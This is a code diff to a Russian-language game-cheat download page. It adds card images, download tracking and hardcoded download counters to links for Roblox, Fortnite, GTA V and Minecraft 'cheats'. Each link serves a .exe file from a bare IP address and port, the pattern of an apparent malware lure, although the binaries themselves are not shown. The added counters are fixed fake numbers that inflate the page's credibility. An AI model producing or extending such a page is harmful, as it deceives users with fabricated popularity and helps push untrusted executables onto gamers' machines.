--- a/index.html
+++ b/index.html
@@ -24,14 +24,18 @@
             <h2>Популярные читы</h2>
             <div class="download-grid">
                 <div class="download-card" onclick="showDescription('xeno-desc')">
+                    <div class="card-bg" style="background-image: url('1.jpg')"></div>
                     <h3>Xeno Executor</h3>
                     <p>Мощный инструмент для Roblox</p>
-                    <a href="http://194.79.46.110:1080/mrx/xeno.exe" class="download-btn">СКАЧАТЬ</a>
+                    <div class="download-count">📥 2,458 скачиваний</div>
+                    <a href="http://194.79.46.110:1080/mrx/xeno.exe" class="download-btn" onclick="trackDownload('xeno')">СКАЧАТЬ</a>
                 </div>
                 <div class="download-card" onclick="showDescription('fortnite-desc')">
+                    <div class="card-bg" style="background-image: url('2.jpg')"></div>
                     <h3>Fortnite Hack</h3>
                     <p>Читы для Fortnite</p>
-                    <a href="http://194.79.46.110:1080/mrx/fortnite.exe" class="download-btn">СКАЧАТЬ</a>
+                    <div class="download-count">📥 1,892 скачиваний</div>
+                    <a href="http://194.79.46.110:1080/mrx/fortnite.exe" class="download-btn" onclick="trackDownload('fortnite')">СКАЧАТЬ</a>
                 </div>
             </div>
         </section>
@@ -41,9 +45,11 @@
             <h2>Игровые трейнеры</h2>
             <div class="download-grid">
                 <div class="download-card" onclick="showDescription('gtav-desc')">
+                    <div class="card-bg" style="background-image: url('3.jpg')"></div>
                     <h3>GTA V Trainer</h3>
                     <p>Трейнер для Grand Theft Auto V</p>
-                    <a href="http://194.79.46.110:1080/mrx/gtav.exe" class="download-btn">СКАЧАТЬ</a>
+                    <div class="download-count">📥 3,127 скачиваний</div>
+                    <a href="http://194.79.46.110:1080/mrx/gtav.exe" class="download-btn" onclick="trackDownload('gtav')">СКАЧАТЬ</a>
                 </div>
             </div>
         </section>
@@ -53,9 +59,11 @@
             <h2>Бесплатные игры</h2>
             <div class="download-grid">
                 <div class="download-card" onclick="showDescription('minecraft-desc')">
+                    <div class="card-bg" style="background-image: url('4.jpg')"></div>
                     <h3>Minecraft Mod</h3>
                     <p>Мод пак для Minecraft</p>
-                    <a href="http://194.79.46.110:1080/mrx/minecraft.exe" class="download-btn">СКАЧАТЬ</a>
+                    <div class="download-count">📥 4,562 скачиваний</div>
+                    <a href="http://194.79.46.110:1080/mrx/minecraft.exe" class="download-btn" onclick="trackDownload('minecraft')">СКАЧАТЬ</a>
                 </div>
             </div>
         </section>
